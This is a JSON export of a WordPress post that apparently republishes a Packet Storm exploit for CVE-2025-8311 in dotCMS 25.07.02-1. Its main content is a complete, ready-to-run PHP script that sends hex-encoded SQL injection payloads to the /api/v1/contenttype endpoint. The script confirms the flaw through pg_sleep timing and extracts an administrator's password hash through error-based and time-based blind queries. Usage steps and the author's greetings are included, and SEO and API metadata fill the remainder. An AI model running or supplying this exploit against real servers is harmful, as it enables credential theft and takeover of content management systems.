{"id":29728,"date":"2025-12-09T12:37:27","date_gmt":"2025-12-09T12:37:27","guid":{"rendered":"http:\/\/localhost\/?p=29728"},"modified":"2025-12-09T12:37:27","modified_gmt":"2025-12-09T12:37:27","slug":"dotcms-250702-1-sql-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=29728","title":{"rendered":"\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection_PACKETSTORM:212607"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-09T17:44:29&#8243;,&#8221;description&#8221;:&#8221;This PHP script represents a sophisticated dual-method SQL Injection exploit targeting dotCMS version 25.07.02-1. The exploit combines time-based blind SQL injection and error-based SQL injection techniques to extract password hashes from the database,&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-09T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-09T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212607&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-8311&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : dotCMS 25.07.02-1 Authenticated Blind SQL Injection (Time-Based)                                                            |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.dotcms.com\/                                                                                                     |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/211125\/ \\u0026 \\tCVE-2025-8311\\n    \\n    [+] Summary :  This PHP script represents a sophisticated dual-method SQL Injection exploit targeting DotCMS content management systems. \\n                   The exploit combines Time-Based Blind SQLi and Error-Based SQLi techniques to extract password hashes from the database, specifically targeting administrator accounts.\\n    \\t\\n    [+]  Usage :   * : Save as: exploit.php\\n                       Run    : php exploit.php\\n    \\t\\n    [+]  POC :\\t\\n      \\n    \\u003c?php\\n    \/*\\n     PoC by Indoushka\\n     *\/\\n    \\n    \/\/=========================\/\/\\n    \/\/ USER CONFIGURATION      \/\/\\n    \/\/=========================\/\/\\n    $HOST          = \\&#8221;127.0.0.1:8443\\&#8221;;\\n    $TARGET_ACCOUNT = \\&#8221;admin@dotcms.com\\&#8221;;\\n    $TOKEN         = \\&#8221;REPLACE_WITH_VALID_JWT\\&#8221;;   \/\/ \\u003c= \u0623\u062f\u062e\u0644 \u062a\u0648\u0643\u0646 \u0635\u062d\u064a\u062d\\n    $SLEEP_TIME    = 10;                         \/\/ seconds\\n    \\n    \/\/=========================\/\/\\n    \/\/ Helper Functions        \/\/\\n    \/\/=========================\/\/\\n    \\n    function hexEncode($str){\\n        $out = \\&#8221;\\&#8221;;\\n        for($i = 0; $i \\u003c strlen($str); $i++){\\n            $out .= sprintf(\\&#8221;%%%02x\\&#8221;, ord($str[$i]));\\n        }\\n        return $out;\\n    }\\n    \\n    function send_request($payload=\\&#8221;\\&#8221;){\\n        global $HOST, $TOKEN;\\n    \\n        $payload = hexEncode($payload);\\n        $url = \\&#8221;https:\/\/{$HOST}\/api\/v1\/contenttype?filter=LCKwsF\\u0026page=774232\\u0026per_page=517532\\u0026orderby=wDdAmr\\u0026direction=DESC\\u0026type=DOTASSET\\u0026host=BBadoI\\u0026sites=PoC{$payload}\\&#8221;;\\n    \\n        $ch = curl_init();\\n        curl_setopt_array($ch, [\\n            CURLOPT_URL =\\u003e $url,\\n            CURLOPT_RETURNTRANSFER =\\u003e true,\\n            CURLOPT_HTTPHEADER =\\u003e [\\n                \\&#8221;Accept: *\/*\\&#8221;,\\n                \\&#8221;Authorization: Bearer {$TOKEN}\\&#8221;,\\n                \\&#8221;User-Agent: Mozilla\/5.0\\&#8221;\\n            ],\\n            CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n            CURLOPT_TIMEOUT =\\u003e 300\\n        ]);\\n    \\n        $start = microtime(true);\\n        $resp  = curl_exec($ch);\\n        $end   = microtime(true);\\n        $delay = $end &#8211; $start;\\n    \\n        curl_close($ch);\\n        return [$resp, $delay];\\n    }\\n    \\n    function send_sqli($q){\\n        $query = \\&#8221;&#8216;) AND 1=(\\&#8221;.$q.\\&#8221;) AND (&#8216;A&#8217; LIKE &#8216;A\\&#8221;;\\n        return send_request($query);\\n    }\\n    \\n    function test_sqli(){\\n        global $SLEEP_TIME;\\n    \\n        echo \\&#8221;[!] Checking connection&#8230;\\\\n\\&#8221;;\\n        list($body, $delay) = send_request();\\n        if(strpos($body, &#8216;\\&#8221;pagination\\&#8221;:{\\&#8221;currentPage\\&#8221;:&#8217;) === false){\\n            echo \\&#8221;[-] Unexpected response!\\\\n\\&#8221;;\\n            exit;\\n        }\\n        echo \\&#8221;[+] Connection OK.\\\\n\\&#8221;;\\n    \\n        echo \\&#8221;[!] Testing Time-Based SQL Injection&#8230;\\\\n\\&#8221;;\\n        list($body, $delay) = send_sqli(\\&#8221;SELECT 1 FROM pg_sleep({$SLEEP_TIME})\\&#8221;);\\n        if($delay \\u003c $SLEEP_TIME){\\n            echo \\&#8221;[-] Sleep test failed.\\\\n\\&#8221;;\\n            \/\/ \u0644\u0627 \u0646\u062e\u0631\u062c \u0645\u0646 \u0627\u0644\u0628\u0631\u0646\u0627\u0645\u062c\u060c \u0642\u062f \u0646\u062c\u0631\u0628 \u0637\u0631\u064a\u0642\u0629 \u0623\u062e\u0631\u0649\\n        } else {\\n            echo \\&#8221;[+] Time-Based SQLi confirmed.\\\\n\\\\n\\&#8221;;\\n            return true;\\n        }\\n        \\n        echo \\&#8221;[!] Testing Error-Based SQL Injection&#8230;\\\\n\\&#8221;;\\n        $result = extract_error_test();\\n        if($result){\\n            echo \\&#8221;[+] Error-Based SQLi confirmed.\\\\n\\\\n\\&#8221;;\\n            return true;\\n        }\\n        \\n        echo \\&#8221;[-] No SQL Injection vulnerability detected.\\\\n\\&#8221;;\\n        exit;\\n    }\\n    \\n    function extract_error_test(){\\n        global $TARGET_ACCOUNT;\\n    \\n        $payload = \\&#8221;&#8216;) AND (SELECT cast((SELECT &#8216;test&#8217; FROM user_ LIMIT 1) as int)) AND (&#8216;A&#8217;=&#8217;A\\&#8221;;\\n        list($resp, $delay) = send_request($payload);\\n    \\n        if(preg_match(&#8216;\/invalid input syntax for type integer: \\&#8221;(.*?)\\&#8221;\/&#8217;, $resp, $m)){\\n            return $m[1];\\n        }\\n        return false;\\n    }\\n    \\n    function extract_error_full(){\\n        global $TARGET_ACCOUNT;\\n    \\n        echo \\&#8221;[!] Attempting Error-Based extraction&#8230;\\\\n\\&#8221;;\\n        \\n        $payload = \\&#8221;&#8216;) AND (SELECT cast((SELECT password_ FROM user_ WHERE emailaddress='{$TARGET_ACCOUNT}&#8217; LIMIT 1) as int)) AND (&#8216;A&#8217;=&#8217;A\\&#8221;;\\n    \\n        list($resp, $delay) = send_request($payload);\\n    \\n        \/\/ \u0627\u0644\u0627\u0644\u062a\u0642\u0627\u0637 \u0645\u0646 \u0631\u0633\u0627\u0644\u0629 \u0627\u0644\u062e\u0637\u0623\\n        if(preg_match(&#8216;\/invalid input syntax for type integer: \\&#8221;(.*?)\\&#8221;\/&#8217;, $resp, $m)){\\n            return $m[1];\\n        }\\n        \\n        \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0646\u0645\u0637 \u0622\u062e\u0631 \u0644\u0631\u0633\u0627\u0644\u0629 \u0627\u0644\u062e\u0637\u0623\\n        if(preg_match(&#8216;\/ERROR: (.*?) at character\/&#8217;, $resp, $m)){\\n            return $m[1];\\n        }\\n        \\n        return false;\\n    }\\n    \\n    function retrieve_data_time_based($template, $charset){\\n        global $SLEEP_TIME, $TARGET_ACCOUNT;\\n    \\n        $charset = \\&#8221;:\\&#8221; . str_replace(\\&#8221;:\\&#8221;,\\&#8221;\\&#8221;,$charset);\\n        $output = \\&#8221;\\&#8221;;\\n        $index = 1;\\n    \\n        while(true){\\n            $found = false;\\n            foreach(str_split($charset) as $c){\\n                $q = str_replace([\\&#8221;[_INDEX_PLACEHOLDER_]\\&#8221;,\\&#8221;[_ASCII_PLACEHOLDER_]\\&#8221;],\\n                                 [$index, ord($c)],\\n                                 $template);\\n    \\n                list($body, $delay) = send_sqli($q);\\n    \\n                if($delay \\u003e= intval($SLEEP_TIME\/2)){\\n                    echo \\&#8221;[+] Found char at position {$index}: {$c}\\\\n\\&#8221;;\\n                    $output .= $c;\\n                    $index++;\\n                    $found = true;\\n                    break;\\n                }\\n            }\\n            if(!$found){ break; }\\n        }\\n        return $output;\\n    }\\n    \\n    function retrieve_data_error_based($charset){\\n        global $TARGET_ACCOUNT;\\n        \\n        $charset = \\&#8221;:\\&#8221; . str_replace(\\&#8221;:\\&#8221;,\\&#8221;\\&#8221;,$charset);\\n        $output = \\&#8221;\\&#8221;;\\n        $index = 1;\\n        \\n        while(true){\\n            $found = false;\\n            foreach(str_split($charset) as $c){\\n                \/\/ \u0628\u0646\u0627\u0621 \u0627\u0633\u062a\u0639\u0644\u0627\u0645 Error-Based\\n                $payload = \\&#8221;&#8216;) AND (SELECT cast((SELECT substring(password_ from {$index} for 1) FROM user_ WHERE emailaddress='{$TARGET_ACCOUNT}&#8217; LIMIT 1) as int)) AND (&#8216;A&#8217;=&#8217;A\\&#8221;;\\n                \\n                list($resp, $delay) = send_request($payload);\\n                \\n                if(preg_match(&#8216;\/invalid input syntax for type integer: \\&#8221;(&#8216;.$c.&#8217;)\\&#8221;\/&#8217;, $resp, $m)){\\n                    echo \\&#8221;[+] Found char at position {$index}: {$c}\\\\n\\&#8221;;\\n                    $output .= $c;\\n                    $index++;\\n                    $found = true;\\n                    break;\\n                }\\n            }\\n            if(!$found){ break; }\\n        }\\n        return $output;\\n    }\\n    \\n    \/\/=========================\/\/\\n    \/\/ MAIN                    \/\/\\n    \/\/=========================\/\/\\n    \\n    echo \\&#8221;========================================\\\\n\\&#8221;;\\n    echo \\&#8221;     DotCMS SQL Injection Exploit      \\\\n\\&#8221;;\\n    echo \\&#8221;     Combined Time \\u0026 Error Based       \\\\n\\&#8221;;\\n    echo \\&#8221;========================================\\\\n\\\\n\\&#8221;;\\n    \\n    \/\/ \u0627\u062e\u062a\u0628\u0627\u0631 \u0648\u062c\u0648\u062f \u0627\u0644\u062b\u063a\u0631\u0629\\n    if(!test_sqli()){\\n        exit;\\n    }\\n    \\n    \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0627\u0644\u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0627\u0644\u0633\u0631\u064a\u0639 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 Error-Based\\n    echo \\&#8221;[!] Trying Error-Based extraction first (faster)&#8230;\\\\n\\&#8221;;\\n    $hash_error = extract_error_full();\\n    \\n    if($hash_error){\\n        echo \\&#8221;\\\\n[\u2713] SUCCESS: Hash extracted via Error-Based SQLi\\\\n\\&#8221;;\\n        echo \\&#8221;[+] HASH for {$TARGET_ACCOUNT}: {$hash_error}\\\\n\\&#8221;;\\n        \\n        \/\/ \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0635\u062d\u0629 \u0627\u0644\u0647\u0627\u0634 (\u0627\u062e\u062a\u064a\u0627\u0631\u064a)\\n        if(strlen($hash_error) \\u003e= 32 \\u0026\\u0026 preg_match(&#8216;\/^[a-f0-9$.\\\\\/]+$\/i&#8217;, $hash_error)){\\n            echo \\&#8221;[\u2713] Hash appears valid (length: \\&#8221; . strlen($hash_error) . \\&#8221; chars)\\\\n\\&#8221;;\\n        }\\n    } else {\\n        echo \\&#8221;[-] Error-Based extraction failed, falling back to Time-Based&#8230;\\\\n\\\\n\\&#8221;;\\n        \\n        \/\/ \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0627\u0644\u0637\u0631\u064a\u0642\u0629 \u0627\u0644\u0632\u0645\u0646\u064a\u0629 \u0643\u062d\u0644 \u0627\u062d\u062a\u064a\u0627\u0637\u064a\\n        $template =\\n        \\&#8221;SELECT (CASE WHEN (substring(password_ from [_INDEX_PLACEHOLDER_] for 1)=chr([_ASCII_PLACEHOLDER_])) \\&#8221;.\\n        \\&#8221;THEN (SELECT 1 FROM pg_sleep(\\&#8221;.intval($SLEEP_TIME\/2).\\&#8221;) WHERE emailaddress = &#8216;{$TARGET_ACCOUNT}&#8217;) \\&#8221;.\\n        \\&#8221;ELSE 1 END) FROM user_ WHERE emailaddress = &#8216;{$TARGET_ACCOUNT}&#8217;\\&#8221;;\\n    \\n        $chars = \\&#8221;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$.\/:\\&#8221;;\\n        \\n        echo \\&#8221;[!] Starting Time-Based extraction (slower)&#8230;\\\\n\\&#8221;;\\n        echo \\&#8221;[!] This may take several minutes&#8230;\\\\n\\&#8221;;\\n        \\n        $pass = retrieve_data_time_based($template, $chars);\\n        \\n        if(!empty($pass)){\\n            echo \\&#8221;\\\\n[\u2713] SUCCESS: Hash extracted via Time-Based SQLi\\\\n\\&#8221;;\\n            echo \\&#8221;[+] HASH for {$TARGET_ACCOUNT}: {$pass}\\\\n\\&#8221;;\\n        } else {\\n            echo \\&#8221;\\\\n[-] FAILED: Could not extract hash using any method.\\\\n\\&#8221;;\\n            echo \\&#8221;    Possible reasons:\\\\n\\&#8221;;\\n            echo \\&#8221;    1. Account does not exist\\\\n\\&#8221;;\\n            echo \\&#8221;    2. Different database structure\\\\n\\&#8221;;\\n            echo \\&#8221;    3. Additional security measures\\\\n\\&#8221;;\\n        }\\n    }\\n    \\n    echo \\&#8221;\\\\n========================================\\\\n\\&#8221;;\\n    echo \\&#8221;               END OF EXPLOIT           \\\\n\\&#8221;;\\n    echo \\&#8221;========================================\\\\n\\&#8221;;\\n    ?\\u003e\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/212607&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.4,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:L\/UI:N\/VC:H\/SC:H\/VI:H\/SI:H\/VA:H\/SA:H&#8221;,&#8221;version&#8221;:&#8221;4.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/212607\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-09T17:44:29&#8243;,&#8221;description&#8221;:&#8221;This PHP script represents a sophisticated dual-method SQL Injection exploit targeting dotCMS version 25.07.02-1. The exploit combines time-based blind SQL injection and error-based SQL injection&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,131,12,13,53,7,11,5],"class_list":["post-29728","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-94","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection_PACKETSTORM:212607 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=29728\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection_PACKETSTORM:212607 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-09T17:44:29&#8243;,&#8221;description&#8221;:&#8221;This PHP script represents a sophisticated dual-method SQL Injection exploit targeting dotCMS version 25.07.02-1. The exploit combines time-based blind SQL injection and error-based SQL injection...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=29728\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-09T12:37:27+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29728#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29728\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection_PACKETSTORM:212607\",\"datePublished\":\"2025-12-09T12:37:27+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29728\"},\"wordCount\":1242,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.4\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=29728#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29728\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29728\",\"name\":\"\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection_PACKETSTORM:212607 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-09T12:37:27+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29728#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=29728\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=29728#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection_PACKETSTORM:212607\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection_PACKETSTORM:212607 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=29728","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection_PACKETSTORM:212607 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-12-09T17:44:29&#8243;,&#8221;description&#8221;:&#8221;This PHP script represents a sophisticated dual-method SQL Injection exploit targeting dotCMS version 25.07.02-1. The exploit combines time-based blind SQL injection and error-based SQL injection...","og_url":"https:\/\/zero.redgem.net\/?p=29728","og_site_name":"zero redgem","article_published_time":"2025-12-09T12:37:27+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=29728#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=29728"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection_PACKETSTORM:212607","datePublished":"2025-12-09T12:37:27+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=29728"},"wordCount":1242,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.4","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=29728#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=29728","url":"https:\/\/zero.redgem.net\/?p=29728","name":"\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection_PACKETSTORM:212607 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-09T12:37:27+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=29728#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=29728"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=29728#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 dotCMS 25.07.02-1 SQL Injection_PACKETSTORM:212607"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/29728","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=29728"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/29728\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=29728"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=29728"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=29728"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}